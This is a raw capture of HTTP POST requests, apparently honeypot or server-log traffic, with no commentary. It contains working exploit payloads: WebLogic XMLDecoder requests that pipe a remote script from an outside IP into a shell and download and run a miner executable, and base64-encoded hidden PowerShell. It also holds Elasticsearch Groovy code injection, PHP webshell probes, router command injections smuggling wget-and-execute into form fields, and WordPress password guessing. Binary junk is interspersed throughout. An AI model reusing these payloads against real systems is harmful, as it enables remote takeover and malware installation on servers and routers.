K6ÍoòKÌVcpjBhC*8kä^H
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å›Ño'Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
AVO2mHJEUjgYaxHqdThnOStuWP76LambRhrvpB4+yi+YiIGCncx0mnB8gT3kPYMYwF8S3BN7TcBiBLaZvYSWBQElz1zDJd3M/vvZwoniP/iFmWBgCr+EoQlfy5YAAiAR3zQaoBLPmkrVefbg7SWVIUrWY/oWT5sq8O/zDsZ5RFa+7A88S3R4/BDcV08oUTwJQvHceuu92vNndG2wC1qfj+YYmwoG1XsfcWqtMimnj5OkhsUdRYAEN6AiHhksS7GzHkGvX4JROruEr7gvsq+xWVVDu20cguC4+NMsOfBZjNTKlFsX+T1fM++ZP0w8SiDB/IPsP5F88ZgiRT8E0onM5KTHo6tjlk9EvOVJdpilN94CRaI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 850
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.kingminer.club/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149594824019&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
566461
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb3b322044d603fe5bc6be18194ec292
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4TQlPuZ8FHjkTb6IqpcNcm7WqTSgZ6p5zN1MJova--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
RKUNx9nJbGyJgjFOcs7HMnj04l8+krBHq6LeV7LoMnNis4r+UlDRg4LJzK5vv/3bn03VBW2NRROtpmV2mi82aoG+x96fkJIGdVI5WZ16FM6MRnG3o3CeWG1Vw7Re6rtNEssa0oFXAQDlaQXZf0RiUyvUGUu0xKSh8Sg33GcwGaMbH0wJytcWtzKaIxCJau1v/D+ZrqN3CcFejgIJa3aEYVYlytYkoViM+5gTRFxJQWLAcLy7v2xxIAcftX/NVWaA7krBhaMKBSbKhcEA6rqokIdD0uhp5AzV2hQs1EAhXGe8N4o0EHCllHZXTrbBHb8nYIotbz3V8K9LMUUMFb76MiGxnfRHGYJ28hdm05poILT25v45iyatuMSobw==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
FKZWyNvAYJmQu7kGPkZXfx2Y4sXvqfXhQHlP7TXKvdygsKdD4F1F/C5bQJ13lgvPTcvA02aCXo//m8LJT0hS3TGuC3jKVV0kLQtSpERSHFWr3W4csLJLAJARspaj52nSLTL/Xv/w5uPhXwpyD6LevY8PctzK5rcE5WzyTdpcQAmXEO0cIdegNNgVFt2dG2hNncmfKQevfl+luiGAY2R+Sk5yppT4N88BxD3yBfogovqZWlfN6pPjHFzpHqBbay81S1dnNk4yAelw0Zj9XDc3Th0DDwZ+UX+7EgmYPKQmM8QLwFbWZ/xCCCf5sM+Mj57DtnGrSSak80J+EF6C3bFVVrgv8vcZT2ONjuEFDcS6fcAAticrXLpiqWzfoA+jMNPWLma+0Be6+mjqbsRtD68JgeMA7Mh7/4ylaztGeFzSVNM0jQ03HBV+eeI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QfZdlNydbDv/zkUHRNi8uHXCk5Nh9Mg467GyaTIQVa/k3/lIcVDsXwe/PsoWY0jEuuJi+bqDajZFKIfVus90+C7noYnfP6BeE68rDe72rwPxNtGEpS/Do7zuTlMT2kVN3aGKFShBTePWkqHKk1xSM0LeIpa1CYv7qk/9oN4lFJkwukCGsshrOlbTQrcb4TrT92275CoqRD5+Re3X8v/kWuQ2VZl/hyrKq7MlQQ39x4qZe4/4ZplHgwlWzoGUXdG1zdfQABFlsX8bbtqX+mhxmmwbPuk3ebLIdbPtgGhnOEYNp9/hBbgLYjRYAZ8GfRjB9UAFkuxUX0M6NiqqvnkzjfNhnbGOiU4lGS++9SemmaaPXxizraJPW+NzQGYchJeLqePsi1TjTW5v72Sa/gPuKreDFyBVDJLoKrquc4ds9l3yOWem7NX3Jzh1xGQi
POST http://check.proxyradar.com/azenv.php?auth=149365060359&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
QqVfxo+Zbc7sSyJiShpbSVH6fDyySdoBhLjH96BjvUP+63Vo6drUw1ymtPwu4h7SbVrCmmodOdvfei/wREqwGyi45KwTaA1NUPICw6qaAn/U74IKYIULs6t5NlfU4Atp56vpeY3IqJM9TCUCS3BQ+k97R5eqF72CAtNV7Fy8Ky8WJ6wAruSax9/+Zw15OfVLevwMrpwNBhVMldUW7GIwEiV2rG1MoNrKJU7kWy3EoyQKHCbWizVOi1+p7dnOLZtaW68VRO393zsWUDFrL/9694dBCdtP3DQVca/bf747nu/BG2NbEhIHAsSAGhjDUWPmUIRYAr9LYc2SXuv4yN4lkpecZ9DAdiSP08jV/UOzZY9S7pQKpXbtaDsWRcAXCxcLQxV/PCqHOAAoCzYXEfep8Aw4
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149453920177&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.best-proxies.ru/azenv.php?auth=146130369815649&a=PC&i=1760126605&p=1080 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue!@#
POST /cgi?2 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 128.199.238.30/mainFrame.htm
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=127.0.0.1;cd /tmp ; wget http://domstates.su/archi.txt;
X_TP_ConnName=ewan_ipoe_s
diagnosticsState=Requested
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å…ùƒ4Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue123
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
423701
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
eb481ae7fb1f61ed4f38db475644465f
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--EAXSHOospjpGwY42PlYo3VUaP9QVTCEcC2k6bYsk--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST /_search HTTP/1.1
Host: x.x.x.x:9200
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"msf_result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\")","lang":"groovy"}}}
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=11111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
RaVXk9/LYbd4CXoOW9rSkqDXc49Y+P9CkyHuCKc4AbiXZ7wdopnYkKdVeakPj5zkK/uRPziQJKjOTlYTIO8DEnC+IIBmh5Vhf8ZVYO3Hhf6ahN2Gr34JI8Ago/vtwa9ovZ5c9BHf45v0ocMXp2B8/RSGV+HZGSZ3/jJWq/2hZMH39sJ5dLp+q42Sp9Qlh9Vn8B7d0mYThfMwTD3YQpBlVZGO5kQsQEz++5/AkmM4U54SwyJdjW/jxL/TBi8IqaB1emI9Mcer4yd/yqdFHMHjRizMulGbkPNM1f/S2qAm0iRJDEySUgORLswqHSxi4XG92ivK9OrCdtMIvEOMn8Mfp8m6vFP4+PJ9KpR9Ioy8TMfrCnRNIB1bTtgQGeM9cPU2Z3rQBsZEG/kgQLJmpWttjVvmS38ovHtGaj2TmScNv6m6
POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
